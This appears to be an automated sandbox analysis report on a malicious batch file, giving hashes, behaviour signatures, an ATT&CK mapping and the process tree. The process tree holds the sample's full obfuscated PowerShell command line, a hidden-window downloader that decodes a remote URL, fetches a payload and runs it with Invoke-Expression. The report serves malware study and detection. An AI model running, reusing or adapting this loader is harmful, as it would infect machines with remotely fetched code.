Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-06-2024 01:32

General

  • Target

    acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83.bat

  • Size

    7KB

  • MD5

    e10969ce40099c5ac570b221d3ec6517

  • SHA1

    c1c2f30a7e7bfede1608e27cbe925f09525e1459

  • SHA256

    acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83

  • SHA512

    d7c3785b4098cf2a45f08cbfe7a5a0e272d2f02e273f2b05da9d050d01019fad671a3fdd9a6c710434c9f43a141a6154bcce64dcface6696ca173ab23ee30923

  • SSDEEP

    192:3+g9OFNNtGLqR4AifzVZrlhddjQEXpdq6P1zoK/J8e7I63iLAn:OZFRG1AibRdjQEXaSBx8ypn

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "cls;write 'Lunke Adstringerende Typograferet Merianernes Abonnementsfunktionen Dueller Paadrages Lavprisvarehusets babyliften Hithertoward';$Sengestolpens = 1;Function metadiabase($Fordeal){$Amenance=$Fordeal.Length-$Sengestolpens;$brnetjs='SUBSTRIN';$brnetjs+='G';For( $Luderne=5;$Luderne -lt $Amenance;$Luderne+=6){$Lunke+=$Fordeal.$brnetjs.Invoke( $Luderne, $Sengestolpens);}$Lunke;}function Lapcock($noninfusibness){ & ($afkastningsgraden) ($noninfusibness);}$Ngtelser=metadiabase ' muniM DeeroGastrzUnplaiFrstel FortlStempaAfson/Eucal5Fitzc.Aarhu0R,tte Macro(electWUgli i Su,enL.kfjdKatodoProfew Jo.dsUnaer HelbeNprotoTfarup budge1.vers0Un.ol.Ka an0Ek po;Relap TraveW,atrii retanAperc6Delpr4Brems; Rom. kaemxObse 6Stand4Accur; frai ,irkerVarevv S,og:Stylt1Udrej2Socia1timo..,edal0Papil)Cleuk XenogG Arc.e H.vacVr,lekLoricoMilie/ Bes.2 Slee0Samme1 Temp0f.nkt0Opfan1 Af e0Spast1Vomme KongFIntariGrav r,nglaeUn.erfpal.eoK allxUnh,a/Manua1safeg2mixer1Ulovm.Distr0Reint ';$Svveflyenes213=metadiabase 'Fad eU SpdbsKarbue Euphr Bisa- St,nAfj.rdg Ka,ieAnstanForsetTermi ';$Abonnementsfunktionen=metadiabase 'IsbryhinvaltBrutetDoitepProna:Dis.r/ Pr,c/DireckGarniaLu.gerKadavoFora.oDatatn pinepKnudecForre. Fuldc Doraochu dmSkri /IblanDV,pste erfecCalibcPr vaaWasqusomp.atAlarmaStrontSalgsiAmphioBema.nIntaceForharVoyagsbambo.Oo ynmTaabesTiosui Emeu ';$tabuleringernes=metadiabase ' Bost>Illeg ';$afkastningsgraden=metadiabase ' Tilsi SceneTarmrxBetto ';$Prcedensers='Lavprisvarehusets';$Serviceberry40 = metadiabase 'Remise Fer,c I idhRuentoDds.g Haan.%cong,aPhy lpMithep destdAppl aDa aitInitia.ccen%Gogop\Ti,sii Pe snTyn.seUbi,ux HexatSe iqedegr,n Id.ms .rueiSpa ebInfeli Tit,lTechniDelfit.taniyAdre..C.mitPDessia Hi.mrKalk. Ju.as&Bra e&Embed Ef,ereParticLogiehSpiseoUdsyn cochtIonos ';Lapcock (metadiabase ' Yest$SukkegPaatrlSu.keoSphecblageraD,serlG ost:BengtN PebeoKn pbn FletsStr tp Bee,i,evsknDeadsoCofous FriseSk,helValbyyTeks = Stag( Rellc.krinmAnhedd aver Ov rr/CoadmcBlokd Sk,l$JavanS Top eBofforHausavAn.epiU,lercInd,reKloa,b DelaePiercr,ihuerPupaey Anal4 fodb0Restu)for,e ');Lapcock (metadiabase 'Charl$Boog.gAppellKoke oAdaptbBuskmaVaretlPaahl:TraadMLy.nse Til rVenguiOliv.aDvrgen Ibsee Un erK,ammnC.ntdeLi.gvsJoggi=Unres$Beta Asemi bunr.fo Monon ObsenBoggaeUundgmGastreTypennEntret spars vitifFladbuOpposnExsa kjubilt C.rkiReageoLandbnUnliteSerennBorge.Bar,esRetorpSponglS.rgeiAll.ctPulli(Sma.d$OutlytSalgsaTllevbUnp,vuSlap lMorskeStrucrAutotiUndernVigregFjernehaerfrForelnJun he,irdesBitto)Forsy ');Lapcock (metadiabase 'Kde t[pitieNA romeScriptFa.ve. BiomSSpinde,tnkerHur.lv VarmiSang,cRevolebasigPMontroKu usibrdden St rtTileeMRadmaaUndernD bita Su rgPlat ekommurtilsm]ekspe:U rli: W ndSVokseepar,lc Co.guExoserRumsti .etttFjel.yPers,P HybrrSewero amletCoineo piercTilsto Fi elTonom Begra=Finde Wy ta[OutdrNGangleVa,elt Susu.Lr,stSRe.iee LubccPuljeu Momsr PrveibaraztLysegyRepl,PudhngrKonveosup rtBredboDow,bcst.rkoDrawelSkr.kTFove.yfrisppUnkineUniv ]br.nd:Uncos: onomTUnde,lWinessStyrt1Socio2 File ');$Abonnementsfunktionen=$Merianernes[0];$Benchership= (metadiabase 'Under$Lullig AncilTeks.oreconbOu,coaSammelAfsej:UnintoLyrikuPja.kt Sungrooecii BeskbId.lebBebotilssernClassg ardd=HrelsNKla ienoncawY ded-FngseOGldstb.devaj Afgoe D.mbcAfdrotSampa BundsSMu cuyEkspls Ba,itSapo eHovedmUnca . Cyp.NBlodbeMumbltTes.a.NazarWUnquieVarskbValduC RapplDespoiTenteekontrnReno t');$Benchership+=$Nonspinosely[1];Lapcock ($Benchership);Lapcock (metadiabase ' Sp.o$Afsmio FrikuFij,at,emflr ,ordiHosenbTilvrb R.kei.pilonHypergfrict.KakatHLiflieVriknaMajond,nquoeUdkryrMicrosHyrer[ Fors$Ca atSMicr,vMask,vPoetieExtrafMoravlGanglyDisb e UndenSuc ie FarbsUdsig2Tyler1 T te3K,ing] Vana= Tr.m$PermuNTran gErobrtCit.ieHandllHo sesSwel.eJerrerW,tli ');$Climatolog59=metadiabase 'Multi$ RailoPrea u H.mat CaisrLokaliT.manbSabotbLa eri andbnApo tgEndop. EquiDPawawoT.pmawProxin omplsubiyoBygakaBabbldVexilFD,mpniProaglHilloeRever(Claus$FerieA SortbPomivoprecon flaan SurceDegram AandeGelatnAlaudt.nextsUnvigfTryk uda.nsnOver kUterutJulesiUf jloHyd inBrokketrakknHj pe,kasse$PlaneWCavith Retoi CoxomPetresBespie lydsy BeslsVe.ar)Fa ee ';$Whimseys=$Nonspinosely[0];Lapcock (metadiabase '.atab$AmatrgCom el Sofao At rbNec,sa FodvlFlapp:ElbowLProxiaSnou,t GambiKortsnT,lsleUformrAffr.eBristn .eep=Flin.(FlugtTLaureeLogomsByggetAmt.l-DebelPFerulaMa.eftRyolfh Com Siest$ToadiW ru dhHelseiR,dobmPsychsUov reShoweyCrap,sAuroc) Taab ');while (!$Latineren) {Lapcock (metadiabase ' Virk$CykelgHarmolDiscioStoneb eldiaGareklStret:MesseMpriski nebosSporoh ,ivea ,ontgSerafsNoter=Inter$ButtetD narrBura,uDeceneFaggr ') ;Lapcock $Climatolog59;Lapcock (metadiabase 'NavneSpermit EvanaMjsomrUnb,otDiese-Na htSCabbalOmbude BasteChaptp.nsea Fes i4 .nte ');Lapcock (metadiabase ' Metr$GerlagKlonglUnaboo UspobPhormaBourglCount:A bejLPleioaHi.tot rundiMouthn Blege reinrSandbe skytn elvu= Semi(StraaTPal eeLaanesGalactPytha-Nrbi.P Eer.aPsychtde adhRootw Lango$Omsa WShutohRanaciRekvimMeninsbemgteNonseydataksZo.ce) God. ') ;Lapcock (metadiabase 'Lemfl$brneog PakvlLu,keoMishnbEkspraSelvbl Sknh:SprecTO,ergyEmaljpTrn toSavfigUn,rorTergiaPlotif BrndeAfl.crb aase IneftForsk=Rhabd$Opgang Ph.slTan,boAccepb.mphoaTumbolImpar:Unan,A .ubgd.hirts FremtGuararK,rdiiPi senTautogCaneleE zymrK,erne jordn Tra,d Gr,vemonos+samme+Swadd%O.ers$MediaMShe.aeElectr Mil i LaboaVinylnHej.eeTallerdo.benhaditeIndbasThist.K nfocStoddoMegaluUnsinn G,yctWilmi ') ;$Abonnementsfunktionen=$Merianernes[$Typograferet];}$Cedertrernes=310097;$Fusoid=30197;Lapcock (metadiabase 'Henla$Ble.fgLea.elRundloBryskbHaireaPro.elUntim:SkrmmbSpndtaHamarbI,neryL rdslNamepiEst.mfHeathtIn.tiePraktnPlads Hoses=Damer P,rsoG SortePinctt Sn.p-SanseCAllokosl dsn HelttElinseraakin LntatG.asf Dr ll$Dish WIndskhSta,tiGuruemConvesKle teOrdstyPrvessKonst ');Lapcock (metadiabase ',mper$RaccogHaliblDiscooOrganb,mpstaSlugtlDisan: LnniU Vaa d avols Overl AnisiF rtrdCalvitundev9 Anci8 pyra proph=Spejd Trosk[AkrotSEvecty,rtissOrthotsulfie SnavmTick . AmmoC StdeoDisk,nAerosv NonbeNecesrtr.mptOcclu]Ek,kl:Inter:LightF In urSpi,loPrimrmCompoB EmbaaMunsisTin.se Fylk6Subbr4LanthSAcceltBrevsrModeriF rsvnMaringSixgu(Geneo$FieldbTilseaUnderb Ich yBe.halOverbiPeni,fForegtStuggeaquafnLitur) Dir ');Lapcock (metadiabase 'Gliri$skjorgDummel Und oProagbArtsbaHematlR.mel:Afri TStbe.eInfarg etanSlattsForlbt A bir To.nrCathreEx,rilIcebosforsbeBrnevn odsv Unsi=Sregn Wacky[ OpslSbenjaysubo,sSgeprtTest eV,deom,ludf.Ret,rTSkatteRenunxMddint Blge.Ring,E SelvnEquivc.olypoAlephdArbejiTalksnur.ehgbgetr] Suba: Sent:FugtsAT.rifS .mklCnonplIGr,nkI Mips.SuperGTaxoleStat,t D taSBindit Skolr LaboiMaw.lnRoyalgHous,(Lumin$Fill.UPou ddLaures UplalBeachiPromudSubt tNonel9Int r8Tinge)tapli ');Lapcock (metadiabase 'Miske$Dent gSki.plPostwoA,rinbreseraudtrelOvers:En heKPortho ellenpl,jetJargor nisoaSibylsIntertReacceD.mhur CongeSlutttEfter=Quive$UnderTPantoeSolskgCaba.nPothesKi,ketForharDep,trFrdigeStilelIta.isA,giseperipn.lang.F,ammsSp,ceuT.itabEnt.psPeriftRenskrQuadriSkospnP.ilogTovt.(Mar.u$,iffeCFrekveMultidRosete NonprBoot,tC,ntarEvaluetal.hrBarranShukueunmals str,, semi$Fri,aFUny cuFle ss G nio Homei GravdFa,ri)Laryn ');Lapcock $Kontrasteret;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\inextensibility.Par && echo t"
        3⤵
          PID:1028

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qmzzoenn.ryu.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2656-2-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp
      Filesize

      8KB

    • memory/2656-12-0x00000250B3D10000-0x00000250B3D32000-memory.dmp
      Filesize

      136KB

    • memory/2656-13-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp
      Filesize

      10.8MB

    • memory/2656-14-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp
      Filesize

      10.8MB

    • memory/2656-15-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp
      Filesize

      10.8MB

    • memory/2656-16-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp
      Filesize

      8KB

    • memory/2656-17-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp
      Filesize

      10.8MB

    • memory/2656-18-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp
      Filesize

      10.8MB